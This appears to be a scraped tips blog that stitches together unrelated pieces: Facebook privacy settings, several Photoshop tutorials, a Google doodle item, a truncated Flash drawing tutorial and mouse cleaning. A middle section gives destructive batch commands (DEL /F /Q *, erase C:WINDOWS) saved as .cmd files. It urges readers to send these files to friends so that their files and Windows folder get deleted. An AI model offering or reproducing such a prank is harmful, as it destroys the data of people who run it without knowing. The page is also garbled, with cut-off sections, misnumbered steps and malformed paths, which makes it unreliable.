How to “Friend” Someone on Facebook & Hide It From Your Status Updates

I’m sure that this has happened to you before. Someone you have ties to, whether it’s a co-worker, your boss, or even worse, a parent, has finally discovered social networking and wants to be your newest Facebook friend.

For me personally, that’s no big deal. I’m fairly open about my online activities. Everything I write, Digg, or otherwise share goes through my FriendFeed to my Twitter then ultimately onto my Facebook (my, that sounds naughty). Besides that, just about everyone I’d consider a co-worker is already on Facebook, and would have little issue about my other Internet activities.

On your Facebook home page, you should see the ‘Settings’ menu close to the search field on your upper-right. Open that menu and go to ‘Privacy Settings’.

On the next page, you’ll have four choices: Profile, Search, News Feed, and Applications. What you’ll want to edit here are your Profile privacy settings.

By default, everything on your profile is limited to your Friends and your Networks (your first Network is likely your city of residence, but you may have joined more). From the screenshot above, you can see that I’ve limited everything on my profile to my Friends and their Friends. Anyone else who visits my profile will only see that I have a profile, but will not see what’s on it.

In my example, you’re going to want to edit the setting on your Status Updates, since you don’t want your boss to know that you’ve “fanned” the competition. Click that dropdown menu and then select ‘Customize’.

You may want to tweak your overall privacy setting here, but what we’re aiming for is the “Except These People” list at the bottom of this dialog. Type out the name of any of your Friends to restrict that person from viewing anything in your Status Updates.

Delete Files and Folder

1. Open Notepad, type: DEL /F /Q *
2. save as and save with name: test.cmd
3. if you double click Notepad, and the effect, files and folder will deleted.

Deleting Specific Files

1. Open Notepad, type: erase C:TEST.txt
2. save as and save with name test.cmd
3. If you double click test.cmd, files TEST.txt in drive c:\ will deleted.

Deleting a Specific Folder
1. Open Notepad, type: erase C:WINDOWS
2. save as and save with name: test.cmd
3. If you double click file test.cmd, WINDOWS folders in drive c:\ will deleted

Now, if done, send Notepad to your friends, anyone. Simple but adverse.

Draw Transformers in Photoshop

Downloading Transformers Fonts

Before getting started into the design, I surf around The Internet looking for similar Transformers fonts. Here is the closest I can get. Download this font and have them installed first.

1. Writing Transformers and Racterized it

Create a new canvas at your preferred size; I’m using 420×250px. Fill it up with black background, write “Transformers” with SF TransRobotics font downloaded just now and centralized it.

Right click on the text layer and select Rasterized type

2. Creating Similarities

Highlight the bottom of "T" and "F" with Maquee Tool, hold Alt and keep pressing Arrow down to increase the length of both these alphabets.

Right click on layer’s Blending Options, and adjust the following style.

Inner Glow

Bevel and Emboss

Color Overlay

Color code: #31464F

Gradiant Overlay

Color Stop 1: #000000, Location: 0%

Color Stop 2: #90999d, Location: 100%

Pattern Overlay

4. A little Glow

Hold Ctrl, left click on the Transformer text’s layer thumbnail to highlight the selection. Create a new layer, select G radiant Tool and draw across from left to right as illustrated in the image above. Change the blend mode to Overlay and adjust Opacity to 50%. Your final product will look something like this.

5. Autobots and Decepticons

SF TransRobotics font’s "<" and ">" draws the logo for Autobots and Decepticons. What you need to do is copy the layer style from "Transformers" and paste it on the logos layers.

Expand the layer, and click on the eye of Gradient Overlay once to hide it. Your final Autobot and Decepticons logo will look something like this.

How To Web 2.0 Logos Are Drawn in Photoshop

Ever wonder how these guys draw their Web 2.0 Logos? Sometimes its nice to learn from others, build up the basic skills and start your own creativity from there. In this Photoshop tutorial, I’m going to reveal you some of the nice Web 2.0 logos, how you can draw their logo exactly the same (well, not really 100% though) with Photoshop.

1. Download and Install style file

First of all, you will need to download a style I’ve created and load it into Photoshop.

Download Photoshop style here. (Right-click -> Save as)
For Photoshop CS2 users, put this style file into
“C:\Program Files\Adobe\Adobe Photoshop CS2\Presets\Styles”

2. Load style

Call up your Style Dialog box in Photoshop

Windows -> Styles
Notice a small arrow button on the top right corner. Click on it and select Load Styles from the drop down
Find web20 from the list and click Load. If you don’t find web20, try close Photoshop, re-open it repeat Step 1.
Click on the arrow button again and select Large List from drop down

Your result should look something similar to the image on the right.

3. The six Web 2.0 Logos

Here’s six Web 2.0 Logo; MyBlogLog, Imified, mixd, skype, Linked In and Go2Web20. The style you’ve just installed is going to reveal how to draw them. I’ll go through “mixd” and “Go2Web20” logos, the rest is just reusing the same technique.

4. How to draw

The reason I use Style here is because once they are saved in to a .asl file (the file you downloaded) they are convenient to apply. Let’s go about drawing some of these logos.

Initial observation, mixd logo consist of

“mixd” text
rounded rectangular
small dot
smaller dot

We will roughly draw them out in Photoshop, each elements in a different layer as illustrated in the image below.

Now here’s the the trick. Look for “mixd-label” in the Style Dialog. Drag them directly to background layer, small dot layer and smaller dot layer respectively. If you drag them correctly you will noticed that the layer will now inherits the colors and blending of the style. Find “mixd-font” in Style Dialog, drag it to the text layer and your mixd logo is complete, 90% like the original I’ll say.

Drawing Go2Web20 Logo

Have 4 new layers created, each for “GO“, “2“, “WEB” and “2.0“

Drag “go2web20-purple” from Style Dialog into “GO” & “WEB”, drag “go2web20-green” into “2″ & “2.0″ and you will get this final output.

As for the rest (MyBlogLog, imified, skype and Linked In), it’s all about dragging their respective style in and match with the correct font.

5. Conclusion

If you look into the Blending Options of each style, you will noticed that most Web 2.0 logos are matter of playing with gradients, strokes with the combination of the right fonts. This may not the “exact” way how these guys had done their logo, but its at least a way to achieve it. I’m not encouraging you to fake their style and redraw your logo, but try understand it and hopefully you can come out with a nice sleek Web 2.0 logo. I love putting my designs in Style (.asl), I can reuse them whenever I want.

1. Create a new Flash file with ActionScript 2.0 features:

How To Creating Metallic Type In Photoshop

The effect in this exercise is as widely used as the drop shadow. Metallic type can be found in car ads, CD covers, and movie logos. A glance through any magazine will produce a myriad of examples. There will be many intermediate steps to this exercise. Keep in mind that the end result is not really what is important here but rather the steps. These steps with a minor alteration—as the use of a different color—will provide the solution to many other situations.

Follow this instruction to make Creating Metallic Type in Photoshop:

1.Create a new file.
Create a Photoshop file large enough to contain the full logo you are about to create.

2.Add a gradient.
Add a linear gradient from top to bottom with the Gradient Tool, using any colors you wish.

3.Add type.
With the Horizontal Type Tool, enter the name you want to use for your logo.

4.Warp text.
In the Type Options bar, click on the Create Warped Text icon. Here you can choose whichever effect and amounts you want. I chose the Rise effect with a small percentage for the Bend. Click OK.

5.Create a path.
Create a path from the type by going to Layer > Type > Create Work Path. The new path can be found under the Path palette. The original text layer can now be discarded or turned off.
Using the Direct Selection tool, the path can be modified to any shape you wish. Additional points can be added to create distortions or mutated shapes as the extended portion of the “C”.

6.Fill path.
Once you have the path completed, create a new layer and fill the path with a color. This can be done in many ways. I prefer to simply click on the Fill Path button at the bottom of the Path palette. Which color you use is irrelevant because you will be overriding it later.

7.Add drop shadow.
Double click (Mac) or Alt-Double click (Win) on the layer in the Layers palette with your logo to bring up the Layer Style dialog box. Steps 7–10 will be done in this dialog box.
In the Layer Style dialog box, choose Drop Shadow. Adjust it however you wish.

8.Add bevel and emboss.
Click on Bevel and Emboss. Choose Chisel Hard for the Technique and pump up the Depth.

9.Add gradient overlay.
Select Gradient Overlay. Click on the gradient to bring up the Gradient Editor. Choose the gradient type that looks like the reflections used in metallic type.
When you choose a particular gradient it appears in the Editor box. You can now adjust the gradient in any way you want. Clicking the paint wells below the gradient allows you to move their position or change their color in the settings area. Clicking below the gradient where there is no well will automatically insert a new well. The wells along the top of the gradient control opacity.

10.Adjust the angle.
Once you have the gradient you want, click OK to exit the Editor. Back in the Layer Style dialog, adjust the Angle so the gradient intersects the logo at the right angle to simulate the reflections in the metal.

11.Add Stroke.
Finally, choose Stroke to add an edge to the logo. Click OK to exit the Layer Styles dialog.
You are now done.

Google's doodles are always the subject of a fair amount of discussion but lately it looks like they've become so common place they've lost some of their initial charm. Still, they provide a unique way of educating the public on some important or at least interesting events or people. Google's latest doodle though is a little different. It doesn't mark a holiday, a great scientist or thinker, not even Tetris' birthday, in fact, no one knows what exactly Google is saying with the new doodle of a flying saucer “abducting” the letter “o” from its name.

The doodle links to a Google search for “unexplained phenomenon” which, in an ironic twist, shows the news results about the fresh Google doodle right on top followed by the usual list of sites one would expect for this kind of search. There doesn't seem to be any historic unexplained phenomenon at this date nor has there been any significant one lately so what exactly does it mean?

Well, Google is giving us a hint by the way of an equally mysterious tweet on the company's main Twitter account. The message in its entirety says: “1.12.12 25.15.21.18 15 1.18.5 2.5.12.15.14.7 20.15 21.19” so it's not that helpful at first glance. But the “code” isn't really much of a cryptographer's conundrum, replacing the numbers with the corresponding letter from the Latin alphabet (A=1, B=2 etc.), the message is revealed to say “All your o are belong to us” a play on the very popular meme from the web's distant past (early 2000's), when the term “meme” wasn't even coined up yet, which said “All your base are belong to us.”

The humorous saying made its rounds through the forums and blogs of the day originating from a very poor translation of a Japanese video game. While the reference is sure to get a giggle from anyone who remembers the simpler times at the start of this century, it doesn't help explaining Google's message one bit but maybe that's the whole point.

Photoshop: Gif Animation: Make a Swipe Effect

Need to create a banner ad that grabs the viewer’s attention? One of the easiest ways to this is to swipe between two images. With this technique, your file size won’t be much larger than simply switching images. This trick makes a Gif Animation: Swipe Effect, follow this tricks:

1.Create a layer set.
In order for this technique to work, all your layers need to be in layer sets. For each swipe effect, you need one layer set. If you are planning to swipe back to the first image, you need to copy the first layer set by using the Duplicate Layer Set command in the Layers palette pop-up.

2.Add layer masks.
Each of the layer sets (except the bottom one) needs to get a layer mask. Select the layer set and click on the layer mask icon at the bottom of the Layers palette.

3.Unlink the layer masks.
The trick behind creating a swipe effect is to animate the layer mask independently from the content. In order to do this, the layer mask and the layer need to be unlinked by clicking on the chain icon between the layer and the layer mask.

4.Fill the first layer mask.
The next step is to make the layers transparent by filling the layer mask with 100% black, which completely masks the content. Start with the top layer (so that you can actually follow what is happening) and select the layer mask by clicking on it and then filling it with the Paint Bucket or use Edit > Fill.

5.Fill the second layer mask.
Select the second layer mask and fill it with black. The bottom layer should now be visible since the two layer sets above have layer masks that are transparent. Open the Animation palette (Window > Animation) and create a new frame in the Animation palette. It is important that you leave the second frame in the Animation palette active before you move to the next step. If it is not active, just click on it and then go to the next step.

6.Animate the layer mask.
Click on the layer mask of the second layer set (in this example the middle one) and change to the Move Tool in the Tool palette. You can now move the layer mask while holding the Shift key (to constrain it to a horizontal movement), but even easier, hold the shift key and hit the right arrow key until the layer mask is moved all the way to the right.

7.Move the second layer mask.
With the last frame (in the Animation window) selected, make two additional key frames by clicking on the New Frame icon at the bottom of the Animation palette. Select the last frame before you continue, then select the layer mask of the top layer in the Layers Palette. Again, switch to the Move Tool and use the arrow key to move the mask to the right. In the process, the bottom layer should gradually become visible again.

8.Tween the keyframes.
In order to create the animation, you have to create the frames in between the frames. This is done with the Tween command that will automatically insert the frames. Select the first two frames and then call the Tween command in the palette’s pop-up menu. Any number of frames can be inserted, but in general you want to keep it to 10–20 frames.

9.Tween the last two keyframes.
Select the last two keyframes and repeat the same procedure. This will complete the loop and if you, indeed, would like your animation to loop, make sure that “forever” is selected in the Animation palette.

10.Set the delay and run the animation.
You’ll likely want to pause your animation a little bit after every swipe effect. Select the last frame after the swipe is complete and change the delay to 2 seconds. Then select the very last frame in the animation and set that also to 2 seconds. To preview your animation, click on the Play button. It’s best to preview the animation in the browser by hitting the Browser Preview button in the Tool palette, because only there will you get an accurate idea how fast the animation plays.

How often have you picked up your photos from the photo finisher only to be unhappily surprised by the color? You think back to the scene and don’t remember the shadows being blue or that the room light was orange while you were taking the pictures. Your eyes see light as neutral, i.e. they balance all light to white. But color film can’t adapt to the light—it captures the light as it really is. For example, on a bright sunny day the shadows will turn out blue (as seen on the left side of picture 1) or in pictures taken in fluorescent light everything will look green (as seen on the left side of picture 2). Professional photographers use color conversion and light

balancing filters while taking color photographs to compensate for undesired color casts that working at certain times of day, at higher altitudes, or in artificial lighting situations may cause. Additionally, photographers use warming or cooling photo filters to subtlety enhance a photo’s mood or color rendition.

1.Which filter to use and when.
The Image Adjustment layer Photo Filters in Photoshop mimic the filters that professional photographers use to correct for color temperature contamination and shifts. The two primary types of color compensation filters are warming and cooling. The warming filters are orange to amber in color and subtract blues and cyan. The cooling filters are blue in color and subtract red, green, and yellow.
The 85 filter is a warming filter. Amber in color; use it to accentuate the warm rendition of a sunset or sunrise and to enrich skin tones.

The 81 filter is a milder warming filter. Pale amber in color; use this filter to remove blue tones in photos taken on overcast days or to clear up bluish shadows in sunny scenes. It is also ideal to add warmth to portraits.
The 80 filter is a cooling filter. Blue in color; use it to correct pictures with strong yellow to orange color casts created by taking the picture in tungsten or candlelight.
The 82 filter is a milder cooling filter. Use it for waterfalls or snow scenes to turn them slightly blue, emphasizing the coolness of the subject.

2.Make the shadows neutral.
The picture of the Portuguese church was taken on a bright, fall afternoon and as you can see the shadows are too blue and unattractively cool. To compensate for this I used the Photoshop Photo Filter Adjustment layer.
Click Layer > New Adjustment Layer > Photo Filter. Click the Filter radio button and select Warming Filter (81) to neutralize the blue shadows. Adjust the density slider—in this example I used a density of 20%.
Changing the layer blending modes can accentuate the color correction effect and by changing the blending mode to overlay, softlight, or hardlight you can achieve excellent results very quickly as seen here.

3.Correct fluorescent lighting.
Pictures taken in office environments or museums often turn out green, which is caused by the fluorescent light. You can create your own custom Photo Filters to correct for problem lighting.
Sample the offending color (in this example, the green color). Create new document of 10 pixels by 10 pixels and fill it with the sampled color.
Choose Image > Adjustments > Invert. Return to the color contaminated image and choose Layer > New Adjustment
Layer > Photo Filter. Click the color radio button, click on the color square, and use the Color Picker to sample the inverted color from the 10 by 10 pixel file and then click OK.

4.Conclusion.
All in all, the Photoshop Photo Filters offer a subtle power to improve images. Since the Photo Filters are Image Adjustment Layers you have the additional advantage of being able to adjust their strength with the layer opacity, layer blending modes, and control where the corrections take place with layer masks. We’re not suggesting that you take bad pictures on purpose—but now you will be able to improve those photos that didn’t turn out the way you expected.

This time, I will try to make a movie similar to Microsoft Paint is a simple program that can draw freely, choose colors, and delete it. Drawing API with features, it is possible to do when the SWF running:

1. Create a new Flash file with ActionScript 2.0 features:

File > New > Flash File (ActionScript 2.0)

2. Import an object drawing pencils and erasers into the library:

File > Import > Import to Library…

3. Drag the image object was imported to the stage.

4. If you do not have a pencil and drawing files eraser, you can make yourself the object by using the Line tool to draw the outline, and the Paint Bucket Tool to color.

5. Selection Pensil object, click right, choose Convert To Symbol menu.

6. Selection of objects pencil, right click, select Convert to Symbol menu.

7. Set the exit point at the end of the pencil color. Click the left 2 times in pencil, then see a plus sign, selection of pencils, pencil pull right to the end of the plus sign.

8. After a Movie Clip, click on the Properties panel, and then give an instance name for Movie Clip with a pencil pencil_mc name.

9. Do the same thing on the object eraser, chose the type of symbol as a button, and give instance name eraser_btn.

10. By using the Oval Tool and the Line Tool, create a form of canned fruit 4 colors with the color of your choice, arranged in a row.

11. Make four of the button, how can selection one color, right click on each tin color, then select Convert to Symbol menu, and chose the type of symbol as a button.

12. In the Properties section, give an instance name of each color tin with a particular color. As an example: blue_btn, yellow_btn, red_btn, green_btn.

13. To make more interesting, make your choice with Text Text Tool.

14. Right-click on the frame, select the Actions menu.

15. After the Actions panel appears, enter the following script:

5. Discard the top of the object. Then select the Interactive Fill Tool (G), colored as in the picture. Click drag the object to give the effect of gradation. 15. Final stage, the selection of all object, then select Object That Creates New Surrounds The Selected Objects in the Property Bar. New object will appear with the outline, bold outline about 3 pt, give the color a bit young or fit your needs, then place it on the back layer of the layer (Shift + Page Down). So over a fish bowl.

How To Clean Your Mouse

This tricks, how to clean your mouse. If your mouse is working sluggishly or not at all, don't go out and buy another cheap mouse. The cause is probably just a dirty mouse. A quick cleaning could fix the problem.
First, you need to identify which kind of mouse you have. If you turn your mouse over and part of a ball is showing, you have a ball mouse. If you see a lens, you have an optical or laser mouse. Each type of mouse requires a different type of cleaning.
The optical or laser mouse does not need to be cleaned near as often as the ball mouse, but it and the surface it runs on can still get dirty. If you do not clean the surface that the mouse moves on, it will soon turn black. So about once a month or so, wipe the surface off with a wet rag. The lens probably never will get dirty, but if it does, take a soft cloth, cotton swab, or q-tip wetted with window cleaner or alcohol and clean the lens.
The ball mouse may need cleaning quite often, so you should get well acquainted with the following cleaning procedure. The dirtier the ball mouse gets, the harder it is to get it to move the cursor on the screen smoothly. If you have to move the mouse across the mouse pad several times to get the cursor to move halfway across the screen, it needs to be cleaned.

The mouse does not need to be disconnected to clean it, but you should close all of the programs that are running, so that you don't accidentally click on something and mess it up. If you do decide to disconnect the mouse, be sure to turn off the computer first. The mouse cord should never be unplugged from the computer while it is running. Doing so could ruin your motherboard.
Turn the ball mouse over and find the cover that holds the ball in. Look for arrows on the cover to show which way it needs to be turned. Place two fingers on the cover and push in the direction of the arrows. Once the cover has been turned about an inch, cover it with your hand and turn the mouse back over to the upright position. The ball and cover should fall into your hand. If it doesn't, shake the mouse gently.
Wipe the ball off with a wet rag.
Now look in the ball well and find the three rollers. Start by cutting across the buildup on the rollers with your fingernail (a knife or steel dental pick may also be used gently), then turn the roller and remove the buildup as you go along. If you do this correctly, you will end up with one curled strip of buildup for each roller. Make sure to remove the buildup from the well. If it falls inside somewhere, blow and gently shake it until it comes out.
Take a wet rag and clean each of the rollers by wiping across it, then turning it and wiping again. Continue until the entire roller is cleaned. Put the ball back in the ball well and lock the cover back in place.
If the mouse still has problems once it is assembled, try cleaning it again. If that doesn't work, you may need to buy a new mouse.
It is a good idea to regularly clean the surface that the mouse is on because the cleaner the surface, the less dirt will get inside the mouse and the less often you will have to clean it.
If your mouse is shared by many people (especially if one of them is sick), you may want to disinfect the top of the mouse between users.
Follow these instructions and your mouse will be up and darting again in no time.
